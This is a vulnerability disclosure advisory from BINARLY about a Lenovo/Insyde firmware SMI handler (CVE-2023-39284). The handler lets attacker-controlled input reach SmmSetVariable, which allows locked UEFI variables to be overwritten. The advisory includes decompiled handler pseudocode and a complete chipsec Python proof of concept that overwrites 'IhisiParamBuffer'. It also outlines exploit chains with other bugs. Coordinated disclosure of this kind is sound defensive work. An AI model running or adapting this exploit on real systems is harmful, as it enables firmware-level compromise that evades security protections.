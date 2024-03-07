Arbitrary calls to SetVariable with unsanitized arguments in SMI handler.

Summary

BINARLY efiXplorer team has discovered a SMI handler that passes attacker controlled arguments to SmmSetVariable() without any sort of filtering/sanitization.

Vulnerability Information

BINARLY internal vulnerability identifier: BRLY-2023-005

Lenovo PSIRT assigned CVE identifier: CVE-2023-39284

CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Affected Lenovo firmwares with confirmed impact by Binarly team

Device/Firmware File Name SHA256 (File PE32 section) File GUID J1CN38WW IhisiServicesSmm 5531a0720cf7b72d99937276df70d7971a137630d5ec8958e1a19f1dee989ff6 87c2106e-8790-459d-bd44-2ef32a68c3f9

Potential impact

An attacker can exploit this vulnerability to arbitrarily invoke SetVariable in System Management Mode (SMM) with attacker-controlled parameters. GetVariable and SetVariable are normally accessible during boot and runtime phases by using the Runtime Services table. However, in this case SetVariable is called from a SMI handler which leads to bypassing different security mechanisms. In particular, SetVariable called from SMM is allowed to overwrite locked variables.

Vulnerability description

The vulnerability exists in child SW SMI handler number 0xEF located at offset 0x828c in the binary. The pseudocode for the function that contains the arbitrary call to SetVarible is shown below:

if ( result >= 0 ) { InputPtr1 = ReadFromRegBuffer ( 44 ); InputPtr2 = ReadFromRegBuffer ( 45 ); if ( ! PtrIsInsideSpecialBuffer (InputPtr1, 16 i64 ) ) return 32811 i64 ; if ( ! PtrIsInsideSpecialBuffer (InputPtr2, 32 i64 ) ) return 32811 i64 ; Data = & InputPtr2->Data; if ( ! ChecksVariableNamePtr (InputPtr1->VariableName) ) return 32811 i64 ; DataSize = InputPtr2->DataSize; if ( InputPtr2->DataSize ) { if ( ! PtrIsInsideSpecialBuffer ( & InputPtr2->Data, DataSize) ) return 32811 i64 ; } VariableName = InputPtr1->VariableName; v6 = 0 i64 ; if ( * InputPtr1->VariableName ) { do { VariableName += 2 ; ++ v6; } while ( * VariableName ); } if ( & InputPtr1->VariableName[ 2 * v6 + 2 ] <= InputPtr2 || InputPtr1 >= ( & InputPtr2->Data + InputPtr2->DataSize) ) { CheckSum = 0 ; for ( i = 0 i64 ; i < DataSize; CheckSum += v9 ) v9 = * (Data + i ++ ); if ( CheckSum + BYTE2 (InputPtr2->CheckSum) ) { return 32786 i64 ; } else { Attributes = *& InputPtr2->Attributes; if ( ! Attributes ) { Attributes = 7 i64 ; *& InputPtr2->Attributes = 7 ; } v11 = 32788 i64 ; if ( gEfiSmmVariableProtocol ) { v12 = (gEfiSmmVariableProtocol->SmmSetVariable)( InputPtr1->VariableName, InputPtr1, Attributes, DataSize, Data); if ( v12 < 0 ) return 32788 i64 ; return v12; } return v11; } } else { return 32811 i64 ; } } return result;

The SMI handler starts by retrieving two pointers to input buffers (InputPtr1 and InputPtr2) and performing a number of security checks, likely to prevent any form of confused deputy attack where a SMI handler is tricked into writing its own SMRAM memory. It then calculate a simple checksum over the variable data, and checks that it matches the checksum provided in the input buffers. Finally, it calls the SmmSetVariable() function by passing arguments that directly derived from the attacker-controlled input buffers (InputPtr1 and InputPtr2).

This makes the functionality of EFI_SMM_VARIABLE_PROTOCOL to be fully exposed to the runtime, which in turn means the variable protection mechanism such as RequestToLock() could be bypassed by a potential attacker.

Steps for exploitation

To exploit this issue, BINARLY efiXplorer team identified a locked variable called "IhisiParamBuffer" (GUID: "92e59835-5f42-4e0b-9a84-47c7810ea806") and tried to overwrite its value. Our team successfully demonstrated that this variable can only be overwritten by using the method described in this advisory. Below is the PoC we developed to test this issue:

import ctypes import struct import uuid import chipsec.chipset from chipsec.hal.interrupts import Interrupts from chipsec.hal.uefi import UEFI cs = chipsec.chipset.cs() cs.init( "ADL" , True , True ) uefi = UEFI(cs) intr = Interrupts(cs) IHISI_SW_SMI = 0x EF class IhisiParamStruct ( ctypes . LittleEndianStructure ): _pack_ = 1 _fields_ = [ ( "Size" , ctypes.c_uint32), ( "Reserved" , ctypes.c_uint32), ( "Param1" , ctypes.c_uint64), ( "Param2" , ctypes.c_uint64), ( "Param3" , ctypes.c_uint64), ( "Param4" , ctypes.c_uint64), ( "Param5" , ctypes.c_uint64), ( "Param6" , ctypes.c_uint64), ( "Param7" , ctypes.c_uint64), ( "Param8" , ctypes.c_uint64), ] def get_param_buffer_address (): param_buffer = uefi.get_EFI_variable( "IhisiParamBuffer" , "92e59835-5f42-4e0b-9a84-47c7810ea806" , ) param_buffer_addr = struct.unpack( "<Q" , param_buffer)[ 0 ] print ( f " { param_buffer_addr = :#x } " ) return param_buffer_addr PARAM_BUFFER_ADDRESS = get_param_buffer_address() def ihisi_get_command_buffer (): command = 0x 83 buffer = IhisiParamStruct() buffer.Size = 0x 48 buffer.Param1 = IHISI_SW_SMI | (command << 8 ) buffer.Param2 = 0x 2448324F # $H2O buffer.Param3 = 0 buffer.Param4 = 0x B2 # SoftwareSmiPort buffer.Param5 = 0 buffer.Param6 = 0 buffer.Param7 = 0 buffer.Param8 = 0 # write new buffer cs.helper.write_physical_mem( PARAM_BUFFER_ADDRESS , 0x 48 , bytes (buffer)) _res = intr.send_SW_SMI( 0 , IHISI_SW_SMI , 0 , 0 , 0 , 0 , 0 , 0 , 0 ) ihisi_status = struct.unpack( "<I" , cs.helper.read_physical_mem( PARAM_BUFFER_ADDRESS + 8 , 4 ) )[ 0 ] print ( f "Get command buffer status: { buffer.Param1 } { ihisi_status } " ) cmd_buffer = struct.unpack( "<Q" , cs.helper.read_physical_mem( PARAM_BUFFER_ADDRESS + 0x 18 , 8 ) )[ 0 ] cmd_buffer_size = struct.unpack( "<Q" , cs.helper.read_physical_mem( PARAM_BUFFER_ADDRESS + 0x 20 , 8 ) )[ 0 ] return cmd_buffer, cmd_buffer_size def get_checksum (data): sum = 0 for b in data: sum = ( sum + b) & 0x FF return ( ~ sum + 1 ) & 0x FF def prepare_target_var_metadata (buffer): # pass security check cs.helper.write_physical_mem(buffer + 0x 1D , 1 , struct.pack( "<B" , 0x 10 )) cs.helper.write_physical_mem(buffer, 12 , b "$H2O$Var$Tbl" ) # set Attributes attributes = 7 cs.helper.write_physical_mem(buffer + 0x 14 , 4 , struct.pack( "<I" , attributes)) # set variable data data = uefi.get_EFI_variable( "IhisiParamBuffer" , "92e59835-5f42-4e0b-9a84-47c7810ea806" , ) old_buffer = struct.unpack( "<Q" , data)[ 0 ] print ( f "old buffer: { old_buffer :#x } " ) # new_buffer = old_buffer + 0x1000 new_buffer = 0x 419AAF98 + 0x 1000 data = struct.pack( "<Q" , new_buffer) print ( f "new buffer: { new_buffer :#x } " ) cs.helper.write_physical_mem(buffer + 0x 20 , len (data), data) # set DataSize data_size = len (data) cs.helper.write_physical_mem(buffer + 0x 10 , 4 , struct.pack( "<I" , data_size)) # set checksum cs.helper.write_physical_mem( buffer + 0x 1E , 1 , struct.pack( "<B" , get_checksum(data)) ) def prepare_target_var_buffer (buffer): vendor_guid = "92e59835-5f42-4e0b-9a84-47c7810ea806" vendor_guid_bytes_le = uuid.UUID(vendor_guid).bytes_le cs.helper.write_physical_mem(buffer, 16 , vendor_guid_bytes_le) variable_name = "IhisiParamBuffer" variable_name_utf16_le = variable_name.encode( "utf-16le" ) cs.helper.write_physical_mem( buffer + 16 , len (variable_name_utf16_le), variable_name_utf16_le ) def vats_write_test (): cmd_buffer, cmd_buffer_size = ihisi_get_command_buffer() print ( f " { cmd_buffer = :#x } (size: { cmd_buffer_size :#x } )" ) target_var_metadata = cmd_buffer + 0x 1000 target_var_buffer = cmd_buffer + 0x 2000 # S01Kn_VatsWrite0000 (VatsWrite) command = 0x 01 buffer = IhisiParamStruct() buffer.Size = 0x 48 buffer.Param1 = IHISI_SW_SMI | (command << 8 ) buffer.Param2 = 0x 2448324F # $H2O buffer.Param3 = 0 buffer.Param4 = 0x B2 # SoftwareSmiPort buffer.Param5 = target_var_buffer buffer.Param6 = target_var_metadata buffer.Param7 = 0 buffer.Param8 = 0 prepare_target_var_metadata(target_var_metadata) prepare_target_var_buffer(target_var_buffer) cs.helper.write_physical_mem( PARAM_BUFFER_ADDRESS , 0x 48 , bytes (buffer)) _res = intr.send_SW_SMI( 0 , IHISI_SW_SMI , 0 , 0 , 0 , 0 , 0 , 0 , 0 ) ihisi_status = struct.unpack( "<I" , cs.helper.read_physical_mem( PARAM_BUFFER_ADDRESS + 8 , 4 ) )[ 0 ] print ( f "VatsWrite status: { buffer.Param1 } { ihisi_status } " ) if __name__ == "__main__" : vats_write_test()

Overwriting locked variables does not represent a vulnerability per se. For this reason, the BINARLY efiXplorer team went a step further and identified two possible venues that can be used by attackers to exploit this issue:

The DXE driver PnpSmm installs a SMI handler that reads the variable "IhisiParamBuffer" and uses it as a pointer for a memory write without doing any sanity check Chain the issue described in this advisory together with the vulnerability disclosed in BRLY-2023-002 to control the stack memory written after a double GetVariable call ("AsfSecureBoot").

How to fix it

A possible way to fix this vulnerability is to check whether a variable is locked before overwriting it.

Disclosure timeline

This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Disclosure Activity Date (YYYY-mm-dd) Insyde/Lenovo PSIRT is notified 2023-06-23 Insyde/Lenovo PSIRT assigned CVE number 2023-09-15 Insyde/Lenovo PSIRT provide patch release 2023-10-31 BINARLY public disclosure date 2024-03-07

Acknowledgements

BINARLY efiXplorer team